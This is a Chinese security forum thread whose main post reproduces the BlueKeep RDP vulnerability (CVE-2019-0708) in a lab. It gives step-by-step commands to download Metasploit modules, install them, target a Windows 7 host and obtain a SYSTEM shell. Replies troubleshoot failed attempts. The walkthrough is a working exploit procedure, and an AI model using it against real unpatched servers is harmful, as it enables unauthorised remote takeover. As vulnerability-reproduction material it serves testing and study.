用户
搜索
  • TA的每日心情
    开心
    2019-7-7 14:34
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    实习版主

    Rank: 7Rank: 7Rank: 7

    4

    主题

    13

    帖子

    2523

    魔法币
    收听
    0
    粉丝
    2
    注册时间
    2016-12-5
    发表于 2019-9-8 01:20:00 133504
    本帖最后由 赛佛爷 于 2019-9-8 01:25 编辑

    ##巨佬轻喷!!!

    漏洞背景:
             Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。
             2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。
    漏洞危害:
          CVE-2019-0708 漏洞是通过检查用户的身份认证,导致
    可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。
    漏洞影响范围:
          该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。
    漏洞测试详细步骤:
    Step1
             开启 Kali-Linux 终端,使用 ifconfig 命令查看本机 IP 地址,如下图:
    图片2.png
    执行apt install metasploit-framework命令来升级 metasploit工具:
      
    图片1.png
    使用如下命令来下载相关 exploit 程序,这些程序一个都不能漏掉,并且按照命令下载对应的漏洞组件。
    第一个:            
    [Bash shell] 纯文本查看 复制代码
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e20884[/url] 97d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.r b

    第二个:
    [Bash shell] 纯文本查看 复制代码
    wget [url]https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e2[/url] 0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

    第三个:
    [Bash shell] 纯文本查看 复制代码
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e208849[/url] 7d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_ bluekeep.rb

    第四个:
    [Bash shell] 纯文本查看 复制代码
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e20884[/url] 97d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_070 8_bluekeep_rce.rb

    随便截个图,如下:
    图片3.png
    这些下载完之后,就需要把它们“各自归位”了。
    Step2
          使用如下命令,我们需要把对应的文件复制到所属文件夹中,但是我们还需要为下载的文件建立一个文件夹,命令如下:mkdir/usr/share/metasploit-framework/modules/exploits/windows/rdp
    然后再进行下面的操作:             
    [Bash shell] 纯文本查看 复制代码
    cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/r dp/

    [Bash shell] 纯文本查看 复制代码
    cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

    [Bash shell] 纯文本查看 复制代码
    cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

    [Bash shell] 纯文本查看 复制代码
    cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/r dp/

    结果如下:
    图片4.png
    Step3
          启动
    msfconsole,并执行reload_all命令加载最新模块:
            
    图片5.png
    现在应该是最新版的 msf 了,请实测的时候更新一下,保持msf的最新状态就行。
    Step4
         输入 search bluekeep 命令:
    图片6.png
    这里显示了我们刚刚添加的 exploit 模块。
    Step5
    使用该 exploit 模块对 Windows7 SP1 系统进行攻击:
    输入命令:
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    set rhosts 192.168.10.65
    set target 3
                   
    图片7.png
    使用 exploit 命令,执行漏洞攻击程序:      
    图片8.png
    这就可以看到目标系统的 CMD 控制台了,接下来查看一下 IP地址和系统信息:       
    图片9.png
    图片10.png
    图片11.png
    查看一下自己的权限:   
    图片12.png
    OK,system权限已到手。

    CVE-2019-0708在Windows7 SP1 系统上的漏洞复现测试完毕。
    其他系统的测试结果还在整理,未完待续……


    图片11.png
    本帖最后由 手机用户SpnBNN 于 2019-9-8 16:26 编辑

    复现不成功..还是感谢
    使用道具 举报 回复
    村长CZ 管理员 有事找村长QQ:780876774 i春秋认证 幽默灌水王 春秋文阁 春秋达人 春秋巡逻 春秋游侠 积极活跃奖 核心白帽
    板凳
    发表于 2019-9-9 10:16:50
    让我们一起干大事!
    村里现在正在招聘:村委宣传队!
    有兴趣的表哥加村长QQ:780876774!
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2019-9-9 16:13:47
    为什么你的不是阉割版的
    使用道具 举报 回复
    赞赞赞~~ 为什么你的成功了,这个exp不行啊,几率性太强了。。。
    使用道具 举报 回复
    你的metasploit-framework是什么版本 ,我这边执行更新提示已是最新版, metasploit v.4.17.3-dve;

    文件复制到对应目录后,执行reload_all  有报错不能加载,
    QQ截图20190911094125.jpg
    使用道具 举报 回复
    发表于 2019-9-11 10:24:32
    手机用户gMDA64 发表于 2019-9-11 09:44
    你的metasploit-framework是什么版本 ,我这边执行更新提示已是最新版, metasploit v.4.17.3-dve;

    文件 ...

    现在msf已经更新到5.0.46版本了,你可以试试更新一下kali源,然后更新一下msf,你这个情况我没遇见过哎
    使用道具 举报 回复
    赛佛爷 发表于 2019-9-11 10:24
    现在msf已经更新到5.0.46版本了,你可以试试更新一下kali源,然后更新一下msf,你这个情况我没遇见过哎 ...

    你的kali  是哪个版本的,我可以考虑换个版本看看
    使用道具 举报 回复
    换了个kali系统版本 ,Meterpreter 可以更新到最新版了。 。但是执行提示这个报错
    QQ截图20190911190250.jpg
    使用道具 举报 回复
    你这个应该是少设置了一步吧
    使用道具 举报 回复
    赛佛爷 发表于 2019-9-11 10:24
    现在msf已经更新到5.0.46版本了,你可以试试更新一下kali源,然后更新一下msf,你这个情况我没遇见过哎 ...

    set payload  这个需要选择哪个
    使用道具 举报 回复
    这个报错提示是什么问题
    QQ图片20190912175752.png
    使用道具 举报 回复
    一直想找关于这个漏洞的复现,自己试一遍不成功,期待后续
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册